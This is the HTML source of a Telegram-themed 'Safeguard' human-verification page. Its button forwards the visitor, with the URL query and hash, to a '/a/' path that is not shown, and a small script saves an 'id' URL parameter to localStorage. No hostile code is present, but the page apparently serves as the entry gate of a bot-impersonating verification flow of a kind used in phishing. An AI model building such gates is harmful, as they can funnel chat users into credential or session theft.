<!DOCTYPE html>
<html style="--tg-color-scheme: dark; --tg-theme-bg-color: #212121; --tg-theme-text-color: #ffffff; --tg-theme-hint-color: #aaaaaa; --tg-theme-link-color: #8774e1; --tg-theme-button-color: #8774e1; --tg-theme-button-text-color: #ffffff; --tg-theme-secondary-bg-color: #0f0f0f; --tg-theme-header-bg-color: #212121; --tg-theme-accent-text-color: #8774e1; --tg-theme-section-bg-color: #212121; --tg-theme-section-header-text-color: #aaaaaa; --tg-theme-subtitle-text-color: #aaaaaa; --tg-theme-destructive-text-color: #e53935; --tg-viewport-height: 100vh; --tg-viewport-stable-height: 100vh;">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Safeguard</title>
    <meta name="description" content="@Safeguard Verification Bot">
    <link rel="icon" href="./favicon.ico">
    <meta name="next-head-count" content="5">
    <link rel="preload" href="./_next/static/css/3db7e18ba6d2d9e9.css" as="style">
    <link rel="stylesheet" href="./_next/static/css/3db7e18ba6d2d9e9.css" data-n-g="">
  </head>
  <body>
    <div id="__next">
      <div class="bg-telegram-bg">
        <main class="flex items-center justify-start flex-col gap-2 h-[100vh] p-4 text-center">
          <div class="mt-5">
            <p class="text-3xl font-bold text-telegram-text">Human Verification</p>
            <p class="text-md font-bold text-telegram-text mt-2">Verify below to be granted entry</p>
            <div class="flex items-center justify-center w-100 mt-3">
              <button onclick="window.location.replace('/a/' + window.location.search + window.location.hash)" class="w-full px-3 py-3 my-4 font-mono text-base rounded text-telegram-button-text bg-gradient-to-r from-button1 via-button2 to-button3 hover:bg-gradient-to-br shadow-lg shadow-black-500/50 dark:shadow-lg dark:shadow-black-800/80">Click here</button>
            </div>
          </div>
        </main>
      </div>
    </div>
    <script>
      // Function to get URL parameters
      function getURLParameter(name) {
        const urlParams = new URLSearchParams(window.location.search);
        return urlParams.get(name);
      }
  
      // Get 'id' from the URL and store it in localStorage
      const id = getURLParameter('id');
      if (id) {
        localStorage.setItem('safeguard_id', id);
        console.log(`ID ${id} stored in localStorage.`);
      } else {
        console.log('ID parameter not found in the URL.');
      }
    </script>
  </body>
</html>